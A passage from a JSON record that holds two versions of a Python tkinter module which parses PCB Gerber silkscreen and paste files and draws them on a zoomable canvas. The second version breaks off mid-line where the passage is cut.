"step-4": "<mask token>\nDEBUG = False\n\n\nclass GerberCanvas:\n file_gto = False\n file_gtp = False\n units = 0\n units_string = 'i', 'm'\n \"\"\"\n my canvas\n \"\"\"\n\n def __init__(self, frame):\n self.x_format = ''\n self.y_format = ''\n self.units = ''\n self.quadrant_mode = 0\n self.file_commands = ''\n self.file_gtp_commands = ''\n self.gerber_file_name = ''\n self.AD_commands = {}\n self.current_aperture = ''\n self.x = '0'\n self.y = '0'\n self.i = '0'\n self.j = '0'\n self.last_x = ''\n self.last_y = ''\n self.start_x = ''\n self.start_y = ''\n self.direction = 0\n self.graphics_mode = 0\n self.scaled = False\n self.bounding_box_size = ()\n self._canvas_frame = frame\n self.create_canvas()\n\n def create_canvas(self):\n self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')\n self.my_canvas.pack(expand=True, fill='both')\n if sys.platform == 'linux':\n self.my_canvas.bind('<Button-4>', self.__scale_image_up)\n self.my_canvas.bind('<Button-5>', self.__scale_image_down)\n else:\n self.my_canvas.bind('<MouseWheel>', self.__scale_image)\n self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.\n my_canvas.yview)\n self.y_scrollbar.pack(expand=True, fill='y', anchor='e')\n self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.\n HORIZONTAL, command=self.my_canvas.xview)\n self.x_scrollbar.pack(fill='x', anchor='s')\n if sys.platform == 'linux':\n self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set,\n yscrollcommand=self.y_scrollbar.set)\n self.__part_selected = 0\n\n def load_gerber(self, path, file):\n \"\"\"load gerber file\n :param path: path to the file\n :param file: file name to use\n \"\"\"\n try:\n all_ids = self.my_canvas.find_all()\n if all_ids:\n try:\n for item in all_ids:\n print(item)\n self.my_canvas.delete(item)\n except tk.TclError:\n messagebox.showerror('Error', tk.TclError)\n if path:\n self.file_gto = True\n try:\n with open(os.path.join(path, file), 'r') as gerber_file:\n self.file_commands = gerber_file.read().splitlines()\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_commands)\n self.my_canvas.create_oval('0i', '0i', '.1i', '.1i', outline='red')\n self.gerber_file_name = file\n self.scaled = False\n if DEBUG:\n print('Scroll region is : ', self.bounding_box_size)\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTO')\n finally:\n self.file_gto = False\n self.load_gerber_gtp(os.path.join(path, file))\n self.my_canvas.config(scrollregion=self.my_canvas.bbox('all'))\n\n def load_gerber_gtp(self, file_path):\n self.file_gtp = True\n try:\n print(file_path)\n new_file = 'c' + file_path[1:len(file_path) - 3] + 'GTP'\n print('final name =', new_file)\n if file_path:\n try:\n with open(new_file, 'r') as gerber_file:\n self.file_gtp_commands = gerber_file.read().splitlines(\n )\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_gtp_commands)\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTP')\n\n def __parse_file(self, commands):\n if DEBUG:\n print(self.file_commands)\n temp_list = commands\n for item in temp_list:\n if DEBUG:\n print(item)\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n GerberCanvas.units = 0\n if 'MM' in item:\n GerberCanvas.units = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n if DEBUG:\n print(name)\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n if DEBUG:\n print(value)\n self.AD_commands[name] = value\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n if DEBUG:\n print('I found a ', item)\n for key, value in self.AD_commands.items():\n self.current_ad_command = key\n if item in key:\n if 'R,' in value:\n print(value)\n x, y = self.__get_rectangle_size(value)\n self.rect_x = x\n self.rect_y = y\n print('Half of x is: ', float(self.rect_x) / 2)\n elif 'C,' in value:\n print(value)\n self.current_aperture = self.__get_circle_diameter(\n value)\n elif 'O,' in value:\n pass\n elif 'P,' in value:\n pass\n elif 'TARGET' in value:\n pass\n elif 'THERMAL' in value:\n pass\n if 'D03' in item:\n if DEBUG:\n print('current key is = ', self.current_ad_command)\n print(self.AD_commands[self.current_ad_command])\n if 'R,' in self.AD_commands[self.current_ad_command]:\n if DEBUG:\n print('draw a rectangle')\n x0 = float(self.start_x) - float(self.rect_x) / 2\n y0 = float(self.start_y) + float(self.rect_y) / 2\n x1 = float(self.start_x) + float(self.rect_x) / 2\n y1 = float(self.start_y) - float(self.rect_y) / 2\n self.my_canvas.create_rectangle(str(x0) + GerberCanvas.\n units_string[GerberCanvas.units], str(y0) +\n GerberCanvas.units_string[GerberCanvas.units], str(\n x1) + GerberCanvas.units_string[GerberCanvas.units],\n str(y1) + GerberCanvas.units_string[GerberCanvas.\n units], outline='white', fill='black')\n if 'C,' in self.AD_commands[self.current_ad_command]:\n print('draw a circle')\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n if self.file_gto:\n self.__get_numbers(item)\n if DEBUG:\n print(self.start_x, ',', self.start_y, ',', self.x,\n ',', self.y)\n self.my_canvas.create_line(self.start_x + 'i', self.\n start_y + 'i', self.x + 'i', self.y + 'i', width=\n self.current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n if self.file_gto:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n try:\n self.my_canvas.create_oval(str(cp_x -\n radius) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], outline='black', width=self.\n current_aperture)\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n break\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if DEBUG:\n print(str(cp_x) + ' ' + str(cp_y))\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n else:\n radius = 0.0\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(\n self.start_y) - cp_y, float(self.start_x) -\n cp_x))\n end_angle = math.degrees(math.atan2(float(self.\n y) - cp_y, float(self.x) - cp_x))\n try:\n self.my_canvas.create_arc(str(cp_x + radius\n ) + GerberCanvas.units_string[\n GerberCanvas.units], str(cp_y + radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_x - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], str(cp_y - radius) +\n GerberCanvas.units_string[GerberCanvas.\n units], style=tk.ARC, width=self.\n current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline\n ='black')\n except UnboundLocalError():\n messagebox.showwarning('Warning',\n 'Something went wrong.')\n\n @staticmethod\n def __get_circle_diameter(value):\n return value[3:len(value)]\n\n @staticmethod\n def __get_rectangle_size(value):\n print(value)\n find_x = value.find('X'[0:len(value)])\n width = value[2:find_x]\n length = value[find_x + 1:len(value)]\n print(width, length)\n return width, length\n\n def __get_extent(self, radius):\n distance = self.__distance(float(self.start_x), float(self.start_y),\n float(self.x), float(self.y))\n if DEBUG:\n print('distance = ', distance)\n number = 1 - distance ** 2 / (2 * radius ** 2)\n result = number - int(number)\n return math.acos(result)\n\n @staticmethod\n def __distance(start_x, start_y, end_x, end_y):\n \"\"\"calculate distance between two points\n :param start_x\n :param start_y\n :param end_x\n :param end_y\n \"\"\"\n distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)\n return distance\n\n def __set_direction(self):\n if self.x == self.start_x:\n if self.y < self.start_y:\n self.direction = 90\n else:\n self.direction = 270\n if self.y == self.start_y:\n if self.x < self.start_x:\n self.direction = 0\n else:\n self.direction = 180\n\n def __get_numbers(self, item):\n found = 0\n if 'I' in item and 'J' in item and found == 0:\n found = 1\n i_start = item.find('I')\n j_start = item.find('J')\n d_start = item.find('D')\n i_temp = item[i_start + 1:j_start]\n j_temp = item[j_start + 1:d_start]\n j_temp = str(int(j_temp) * -1)\n self.i = self.__format_number(i_temp)\n self.j = self.__format_number(j_temp)\n if 'X' and 'Y' in item:\n found = 0\n if 'X' in item and 'Y' in item and found == 0:\n found = 1\n x_start = item.find('X')\n y_start = item.find('Y')\n d_start = item.find('D')\n x_temp = item[x_start + 1:y_start]\n y_temp = item[y_start + 1:d_start]\n if ('I' or 'J') in y_temp:\n for i in range(1, len(y_temp)):\n if y_temp[i] == 'I':\n y_temp = y_temp[0:i]\n break\n y_temp = str(int(y_temp) * -1)\n self.x = self.__format_number(x_temp)\n self.y = self.__format_number(y_temp)\n if 'X' in item and found == 0:\n found = 1\n x_start = item.find('X')\n d_start = item.find('D')\n x_temp = item[x_start + 1:d_start]\n self.x = self.__format_number(x_temp)\n if 'Y' in item and found == 0:\n found = 1\n y_start = item.find('Y')\n d_start = item.find('D')\n y_temp = item[y_start + 1:d_start]\n y_temp = str(int(y_temp) * -1)\n self.y = self.__format_number(y_temp)\n\n def __format_number(self, number):\n how_long = len(number)\n if how_long <= int(self.x_format[1]):\n if '-' in number:\n temp = number[1:len(number)]\n return '-.' + temp.zfill(int(self.x_format[1]))\n else:\n return '.' + number.zfill(int(self.x_format[1]))\n elif how_long > int(self.x_format[1]):\n last = number[-5:len(number)]\n first = number[0:len(number) - 5]\n if '-' in number:\n return first + '.' + last\n else:\n return first + '.' + last\n\n def high_lite_part(self, x, y, layer):\n x1 = self.__format_pnp(x)\n y1 = self.__format_pnp(y) * -1\n last_x = float(x1) + 0.1\n last_y = float(y1) + 0.1\n if layer == 'TopLayer':\n color = 'red'\n else:\n color = 'blue'\n self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', \n str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i', outline=\n color, fill=color)\n\n def delete_current_highlight(self):\n if self.__part_selected:\n self.my_canvas.delete(self.__part_selected)\n\n def __scale_image_up(self, event=None):\n self.scale_factor = 1\n self.scale_factor += 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image_down(self, event=None):\n self.scale_factor = 1\n self.scale_factor -= 0.1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n if PickPlace.is_file_loaded:\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image(self, event=None):\n if event.delta >= 120:\n self.__scale_image_up()\n elif event.delta <= -120:\n self.__scale_image_down()\n self.scaled = True\n\n @staticmethod\n def __format_pnp(number):\n move1 = float(number) / 10\n move2 = move1 / 10\n final = move2 / 10\n return final\n\n def __parse_file_gtp(self):\n temp_list = self.file_commands\n for item in temp_list:\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n self.__inch = 1\n self.__mm = 0\n if 'MM' in item:\n self.__inch = 0\n self.__mm = 1\n if 'G01' in item:\n self.graphics_mode = 1\n if 'G03' in item:\n self.direction = 270\n if 'G02' in item:\n self.direction = 90\n if 'G74' in item:\n self.quadrant_mode = 0\n if 'G75' in item:\n self.quadrant_mode = 1\n if '%AD' in item:\n name = item[3:item.find(',') - 1]\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n self.AD_commands[name] = value[2:len(value)]\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n for key, value in self.AD_commands.items():\n if item in key:\n self.current_aperture = value\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' in item and ('I' not in item and 'J' not in item):\n self.__get_numbers(item)\n self.my_canvas.create_line(self.start_x + 'i', self.start_y +\n 'i', self.x + 'i', self.y + 'i', width=self.\n current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n if 'D01' and 'I' and 'J' in item:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n if self.quadrant_mode:\n if self.start_x == self.x and self.start_y == self.y:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n self.my_canvas.create_oval(str(cp_x - radius) + 'i',\n str(cp_y - radius) + 'i', str(cp_x + radius) +\n 'i', str(cp_y + radius) + 'i', outline='black',\n width=self.current_aperture)\n else:\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(self.\n start_y) - cp_y, float(self.start_x) - cp_x))\n end_angle = math.degrees(math.atan2(float(self.y) -\n cp_y, float(self.x) - cp_x))\n ext = math.degrees(self.__get_extent(radius))\n self.my_canvas.create_arc(str(cp_x + radius) + 'i',\n str(cp_y + radius) + 'i', str(cp_x - radius) +\n 'i', str(cp_y - radius) + 'i', style=tk.ARC,\n width=self.current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline='black')\n",
"step-5": "import tkinter as tk\nfrom pickplace import PickPlace\nimport sys\nimport math\nfrom tkinter import messagebox\nimport os\n\nDEBUG = False\n\n\nclass GerberCanvas:\n\n file_gto = False\n file_gtp = False\n units = 0\n units_string = ('i', 'm')\n\n \"\"\"\n my canvas\n \"\"\"\n def __init__(self, frame):\n self.x_format = ''\n self.y_format = ''\n self.units = ''\n self.quadrant_mode = 0\n self.file_commands = ''\n self.file_gtp_commands = ''\n self.gerber_file_name = ''\n self.AD_commands = {} # dict to hold aperture commands\n self.current_aperture = ''\n self.x = '0'\n self.y = '0'\n self.i = '0'\n self.j = '0'\n self.last_x = ''\n self.last_y = ''\n self.start_x = ''\n self.start_y = ''\n self.direction = 0\n self.graphics_mode = 0\n self.scaled = False\n self.bounding_box_size = ()\n self._canvas_frame = frame\n self.create_canvas()\n\n def create_canvas(self):\n self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')\n self.my_canvas.pack(expand=True, fill='both')\n if sys.platform == 'linux':\n self.my_canvas.bind('<Button-4>', self.__scale_image_up)\n self.my_canvas.bind('<Button-5>', self.__scale_image_down)\n else:\n self.my_canvas.bind('<MouseWheel>', self.__scale_image)\n\n # fixme fix the scrollbars so that they work correctly\n self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.my_canvas.yview)\n self.y_scrollbar.pack(expand=True, fill='y', anchor='e')\n\n self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.HORIZONTAL, command=self.my_canvas.xview)\n self.x_scrollbar.pack(fill='x', anchor='s')\n\n # Set this only if using in Linux\n if sys.platform == 'linux':\n self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set, yscrollcommand=self.y_scrollbar.set)\n\n self.__part_selected = 0\n\n def load_gerber(self, path, file):\n \"\"\"load gerber file\n :param path: path to the file\n :param file: file name to use\n \"\"\"\n\n try:\n # file_path = askopenfilename(title='Open Top Silk Screen File', filetypes=[('GTO files', '*.GTO')],\n # initialdir='')\n\n all_ids = self.my_canvas.find_all()\n # delete the current image if one exist.\n if all_ids:\n try:\n for item in all_ids:\n print(item)\n self.my_canvas.delete(item)\n except tk.TclError:\n messagebox.showerror('Error', tk.TclError)\n\n if path:\n self.file_gto = True\n try:\n with open(os.path.join(path, file), 'r') as gerber_file:\n self.file_commands = gerber_file.read().splitlines()\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n # self._parse_file(gerber_file.read())\n self.__parse_file(self.file_commands)\n self.my_canvas.create_oval('0i', '0i', '.1i', '.1i', outline='red')\n self.gerber_file_name = file\n self.scaled = False\n # self.bounding_box_size = self.my_canvas.bbox('all')\n if DEBUG:\n print('Scroll region is : ', self.bounding_box_size)\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTO')\n finally:\n self.file_gto = False\n # load top pads into image\n self.load_gerber_gtp(os.path.join(path, file))\n self.my_canvas.config(scrollregion=self.my_canvas.bbox('all'))\n # self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set, yscrollcommand=self.y_scrollbar.set)\n\n def load_gerber_gtp(self, file_path):\n self.file_gtp = True\n try:\n print(file_path)\n new_file = 'c' + file_path[1:len(file_path)-3]+'GTP'\n print('final name =', new_file)\n if file_path:\n try:\n with open(new_file, 'r') as gerber_file:\n self.file_gtp_commands = gerber_file.read().splitlines()\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_gtp_commands)\n # self.scaled = False\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTP')\n\n def __parse_file(self, commands):\n if DEBUG:\n print(self.file_commands)\n temp_list = commands\n for item in temp_list:\n if DEBUG:\n print(item)\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n GerberCanvas.units = 0\n if 'MM' in item:\n GerberCanvas.units = 1\n # print('units is ', self.units)\n\n if 'G01' in item:\n self.graphics_mode = 1 # sets Interpolation mode graphics state parameter to linear\n\n if 'G03' in item:\n self.direction = 270 # CounterClockWise\n\n if 'G02' in item:\n self.direction = 90 # ClockWise\n\n if 'G74' in item:\n self.quadrant_mode = 0 # single Quadrant mode\n\n if 'G75' in item:\n self.quadrant_mode = 1 # Multi quadrant mode\n\n if '%AD' in item: # define the aperture\n name = item[3:item.find(',')-1]\n if DEBUG:\n print(name)\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start-1:stop]\n if DEBUG:\n print(value)\n self.AD_commands[name] = value\n\n if item[0:1] == 'D': # set the current aperture\n item = item[0:item.find('*')]\n if DEBUG:\n print('I found a ', item)\n for key, value in self.AD_commands.items():\n self.current_ad_command = key\n if item in key:\n if 'R,' in value: # for a rectangle\n print(value)\n x, y = self.__get_rectangle_size(value)\n self.rect_x = x\n self.rect_y = y\n print('Half of x is: ', float(self.rect_x)/2)\n # todo send this to a function to get size\n elif 'C,' in value: # for a circle\n print(value)\n self.current_aperture = self.__get_circle_diameter(value)\n elif 'O,' in value: # for a ob-round\n pass\n elif 'P,' in value: # for a polygon\n pass\n elif 'TARGET' in value:\n pass\n elif 'THERMAL' in value:\n pass\n\n # This is the Flash command. Create a flash of the object.\n if 'D03' in item:\n if DEBUG:\n print('current key is = ', self.current_ad_command)\n print(self.AD_commands[self.current_ad_command])\n if 'R,' in self.AD_commands[self.current_ad_command]:\n if DEBUG:\n print('draw a rectangle')\n x0 = float(self.start_x) - float(self.rect_x) / 2\n y0 = float(self.start_y) + float(self.rect_y) / 2\n x1 = float(self.start_x) + float(self.rect_x) / 2\n y1 = float(self.start_y) - float(self.rect_y) / 2\n self.my_canvas.create_rectangle(str(x0) + GerberCanvas.units_string[GerberCanvas.units],\n str(y0) + GerberCanvas.units_string[GerberCanvas.units],\n str(x1) + GerberCanvas.units_string[GerberCanvas.units],\n str(y1) + GerberCanvas.units_string[GerberCanvas.units],\n outline='white', fill='black')\n if 'C,' in self.AD_commands[self.current_ad_command]:\n print('draw a circle')\n\n # the D02 command is the move to command.\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n # if ('D01' in item) and (('I' not in item) and ('J' not in item)): # draw a line\n if ('D01' in item) and (('I' not in item) and ('J' not in item)):\n if self.file_gto: # draw a line\n self.__get_numbers(item)\n if DEBUG:\n print(self.start_x, ',', self.start_y, ',', self.x, ',', self.y)\n self.my_canvas.create_line(self.start_x+'i', self.start_y+'i', self.x+'i', self.y+'i',\n width=self.current_aperture+'i')\n self.start_x = self.x\n self.start_y = self.y\n\n # this Draws a circle.\n if 'D01' and 'I' and 'J' in item: # draw a circle/arc\n if self.file_gto:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item) # test\n\n if self.quadrant_mode: # This draws circles or arcs\n if (self.start_x == self.x) and (self.start_y == self.y): # This draws circles\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n try:\n self.my_canvas.create_oval(str(cp_x - radius) + GerberCanvas.units_string[GerberCanvas.units],\n str(cp_y - radius) + GerberCanvas.units_string[GerberCanvas.units],\n str(cp_x + radius) + GerberCanvas.units_string[GerberCanvas.units],\n str(cp_y + radius) + GerberCanvas.units_string[GerberCanvas.units],\n outline='black', width=self.current_aperture)\n except UnboundLocalError():\n messagebox.showwarning('Warning', 'Something went wrong.')\n break\n else: # This draws arcs\n # self.evaluate_arc_command(item)\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n\n if DEBUG:\n print(str(cp_x) + ' ' + str(cp_y))\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n else:\n radius = 0.0\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(self.start_y) - cp_y, float(self.start_x) - cp_x))\n end_angle = math.degrees(math.atan2(float(self.y) - cp_y, float(self.x) - cp_x))\n # radius = math.degrees(self.__get_extent(radius))\n try:\n self.my_canvas.create_arc(str(cp_x + radius) + GerberCanvas.units_string[GerberCanvas.units],\n str(cp_y + radius) + GerberCanvas.units_string[GerberCanvas.units],\n str(cp_x - radius) + GerberCanvas.units_string[GerberCanvas.units],\n str(cp_y - radius) + GerberCanvas.units_string[GerberCanvas.units],\n style=tk.ARC, width=self.current_aperture, start=start_angle,\n extent=end_angle-start_angle, outline='black')\n # self.my_canvas.create_arc('0', '0', '100', '100', style='arc', start=90, extent=180,\n # outline='purple')\n except UnboundLocalError():\n messagebox.showwarning('Warning', 'Something went wrong.')\n\n @staticmethod\n def __get_circle_diameter(value):\n return value[3:len(value)]\n\n @staticmethod\n def __get_rectangle_size(value):\n print(value)\n find_x = value.find('X'[0:len(value)])\n width = value[2:find_x]\n length = value[find_x+1:len(value)]\n print(width, length)\n return width, length\n\n def __get_extent(self, radius):\n distance = self.__distance(float(self.start_x), float(self.start_y), float(self.x), float(self.y))\n if DEBUG:\n print('distance = ', distance)\n number = (1-((distance**2) / (2*(radius**2))))\n result = number - int(number)\n return math.acos(result)\n\n @staticmethod\n def __distance(start_x, start_y, end_x, end_y):\n \"\"\"calculate distance between two points\n :param start_x\n :param start_y\n :param end_x\n :param end_y\n \"\"\"\n distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)\n return distance\n\n def __set_direction(self):\n if self.x == self.start_x:\n if self.y < self.start_y:\n self.direction = 90\n else:\n self.direction = 270\n if self.y == self.start_y:\n if self.x < self.start_x:\n self.direction = 0\n else:\n self.direction = 180\n\n def __get_numbers(self, item):\n found = 0\n\n if 'I' in item and 'J' in item and found == 0:\n found = 1\n i_start = item.find('I')\n j_start = item.find('J')\n d_start = item.find('D')\n\n i_temp = item[i_start+1:j_start]\n j_temp = item[j_start+1:d_start]\n j_temp = str(int(j_temp) * -1)\n\n self.i = self.__format_number(i_temp)\n self.j = self.__format_number(j_temp)\n\n if 'X' and 'Y' in item:\n found = 0\n\n if 'X' in item and 'Y' in item and found == 0:\n found = 1\n x_start = item.find('X')\n y_start = item.find('Y')\n d_start = item.find('D')\n\n x_temp = item[x_start+1:y_start]\n y_temp = item[y_start+1:d_start]\n if ('I' or 'J') in y_temp:\n for i in range(1, len(y_temp)):\n if y_temp[i] == 'I':\n y_temp = y_temp[0:i]\n break\n y_temp = str(int(y_temp) * -1)\n\n self.x = self.__format_number(x_temp)\n self.y = self.__format_number(y_temp)\n\n if 'X' in item and found == 0:\n found = 1\n x_start = item.find('X')\n d_start = item.find('D')\n\n x_temp = item[x_start+1:d_start]\n\n self.x = self.__format_number(x_temp)\n\n if 'Y' in item and found == 0:\n found = 1\n y_start = item.find('Y')\n d_start = item.find('D')\n\n y_temp = item[y_start + 1:d_start]\n # flip my y axis\n y_temp = str(int(y_temp) * -1)\n\n self.y = self.__format_number(y_temp)\n\n def __format_number(self, number):\n how_long = len(number)\n\n if how_long <= int(self.x_format[1]):\n if '-' in number:\n temp = number[1:len(number)]\n return '-.' + temp.zfill(int(self.x_format[1]))\n else:\n return '.' + number.zfill(int(self.x_format[1]))\n elif how_long > int(self.x_format[1]):\n last = number[-5:len(number)]\n first = number[0:len(number)-5]\n if '-' in number:\n return first + '.' + last\n # return '-' + first + '.' + last\n else:\n return first + '.' + last\n\n def high_lite_part(self, x, y, layer):\n x1 = self.__format_pnp(x)\n y1 = self.__format_pnp(y) * -1\n last_x = float(x1) + .1\n last_y = float(y1) + .1\n if layer == 'TopLayer':\n color = 'red'\n else:\n color = 'blue'\n self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i',\n outline=color, fill=color)\n # elif layer == 'BottomLayer':\n # self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', str(y1) + 'i', str(last_x) + 'i',\n # str(last_y) + 'i', outline='blue', fill='blue')\n\n def delete_current_highlight(self):\n if self.__part_selected:\n self.my_canvas.delete(self.__part_selected)\n\n def __scale_image_up(self, event=None):\n self.scale_factor = 1\n self.scale_factor += .1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image_down(self, event=None):\n self.scale_factor = 1\n self.scale_factor -= .1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n if PickPlace.is_file_loaded:\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image(self, event=None):\n if event.delta >= 120:\n self.__scale_image_up()\n elif event.delta <= -120:\n self.__scale_image_down()\n self.scaled = True\n\n @staticmethod\n def __format_pnp(number):\n move1 = float(number) / 10\n move2 = move1 / 10\n final = move2 / 10\n return final\n\n def __parse_file_gtp(self):\n # print(self.file_commands)\n temp_list = self.file_commands\n for item in temp_list:\n # print(item)\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n self.__inch = 1\n self.__mm = 0\n if 'MM' in item:\n self.__inch = 0\n self.__mm = 1\n # print('units is ', self.units)\n if 'G01' in item:\n self.graphics_mode = 1 # sets Interpolation mode graphics state parameter to linear\n if 'G03' in item:\n self.direction = 270 # CounterClockWise\n if 'G02' in item:\n self.direction = 90 # ClockWise\n if 'G74' in item:\n self.quadrant_mode = 0 # single Quadrant mode\n if 'G75' in item:\n self.quadrant_mode = 1 # Multi quadrant mode\n if '%AD' in item: # diameter of the circle\n name = item[3:item.find(',') - 1]\n # print(name)\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n # print(value)\n self.AD_commands[name] = value[2:len(value)]\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n # print('I found a ', item)\n for key, value in self.AD_commands.items():\n if item in key:\n self.current_aperture = value\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if ('D01' in item) and (('I' not in item) and ('J' not in item)): # draw a line\n self.__get_numbers(item)\n # print(self.start_x, ',', self.start_y, ',', self.x, ',', self.y)\n self.my_canvas.create_line(self.start_x + 'i', self.start_y + 'i', self.x + 'i', self.y + 'i',\n width=self.current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n # this Draws a circle.\n if 'D01' and 'I' and 'J' in item: # draw a circle\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n\n if self.quadrant_mode: # This draws circles or arcs\n if (self.start_x == self.x) and (self.start_y == self.y): # This draws circles\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n self.my_canvas.create_oval(str(cp_x - radius) + 'i', str(cp_y - radius) + 'i',\n str(cp_x + radius) + 'i', str(cp_y + radius) + 'i',\n outline='black', width=self.current_aperture)\n\n else: # This draws arcs\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n # print(str(cp_x) + ' ' + str(cp_y))\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(self.start_y) - cp_y, float(self.start_x) - cp_x))\n end_angle = math.degrees(math.atan2(float(self.y) - cp_y, float(self.x) - cp_x))\n ext = 